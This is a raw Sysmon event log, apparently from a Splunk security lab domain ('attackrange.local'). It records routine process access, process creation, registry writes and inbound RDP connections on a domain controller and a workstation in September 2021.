09:25:29.798{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.798{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.798{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E09-6151-C100-00000000FD01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.798{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E09-6151-C100-00000000FD01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.799{5EBD8912-8E09-6151-C100-00000000FD01}2192C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.673{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F910CFA138D4C966D71514DC0CE0ED6,SHA256=790B7BA0612BA65D44C84D1B4EF76578FCB3DC293E5BF480166648F0118D99A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981655Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:25.871{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54342-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981654Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:29.435{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E9519FED4E6F21D6B8B8481601545A42,SHA256=585D002023169A088FB89DE5B8AEADFEEC8D3F9E755DD259E4E13E71BAAC593E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981653Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:29.341{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ECFD4D6CC1A488CD28F854E24BCFE96,SHA256=1E08BC271939FC7EA377F939107A988EBE3890B438212E0C7F64A0F80D039E12,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981652Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:29.060{69CF5F33-8E08-6151-277A-00000000FD01}37002476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.955{5EBD8912-8E0A-6151-C200-00000000FD01}57804628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001057140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.632{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54267-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001057139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.632{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54267-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001057138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.893{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EA918A5319EF8E23A208BA04E2E23A1,SHA256=220EA6F08322762B628579B78EAE30B34D0366C3435A0BE784C27265494046F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E0A-6151-C200-00000000FD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E0A-6151-C200-00000000FD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.783{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E0A-6151-C200-00000000FD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.784{5EBD8912-8E0A-6151-C200-00000000FD01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.736{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C57D0BC7CAE9B7F7C8798095CDA01BC,SHA256=1E6BFBAC1E1F01E9ECBBF0F8F832A0697FD3B91822D1D0F7EAF2E2FC23984DB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981658Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:27.327{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55288-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981657Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:26.475{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-52589-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981656Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:30.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519FF9B565B15BB602AAB21C0771A5C7,SHA256=D09ADC854CD5EC9FC34E7B5D9B971A85A5C48809076AFE6CBCD9CE984BDA55B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.236{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1E2954B8E4776425E0A654D344D31A5F,SHA256=1AAC1845CAA448A391AE3E0C19055BB56644B0770BE2FBFFC93495FC703041BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.220{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=AC5FC9CE04DF4779CB96E4DC077CDF33,SHA256=97B162FFC6441C6B80B35FE1C3AD3BE2915AD8A27CB517FEDE53B8A089BEF510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.158{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=AC5FC9CE04DF4779CB96E4DC077CDF33,SHA256=97B162FFC6441C6B80B35FE1C3AD3BE2915AD8A27CB517FEDE53B8A089BEF510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.158{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=088992274F536E6DE47853668B4283D7,SHA256=E3B47076C7CC9889D8322E8D95D66E2F186ECABA6FE58202B87097FBC4FD0C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.111{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=DE5123F1D7AE5C21C449CEC13DD2EDF9,SHA256=91FD23234C7110D514CF974FD15B4521887DD50DA39DDF5C104BADCFFD8723BF,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001057123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:25:30.095{5EBD8912-8CD0-6151-2E00-00000000FD01}2384\Winsock2\CatalogChangeListener-950-0C:\Windows\system32\DFSRs.exe 10341000x80000000000000001057122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.095{5EBD8912-8CC0-6151-1000-00000000FD01}4401160C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001057121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.080{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.080{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1ec9a|C:\Windows\SYSTEM32\samsrv.dll+5e81|C:\Windows\SYSTEM32\samsrv.dll+5d82|C:\Windows\SYSTEM32\samsrv.dll+1594e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001057119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:30.048{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x80000000000000001057118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:30.048{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Config SourceDWORD (0x00000001) 13241300x80000000000000001057117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:25:30.048{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_C073BBA9-345E-4F58-AADF-98D983B75502.XML 